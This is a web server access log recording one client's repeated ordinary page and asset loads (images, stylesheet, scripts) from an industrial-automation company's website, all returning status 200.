"https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:01 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:17 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 1865] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:20:18 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10541] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:09 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:21:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:10 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:52:11 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:27 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10548] [Gzip 5.41] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20841] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:43 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" +[18/Feb/2026:13:57:44 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" 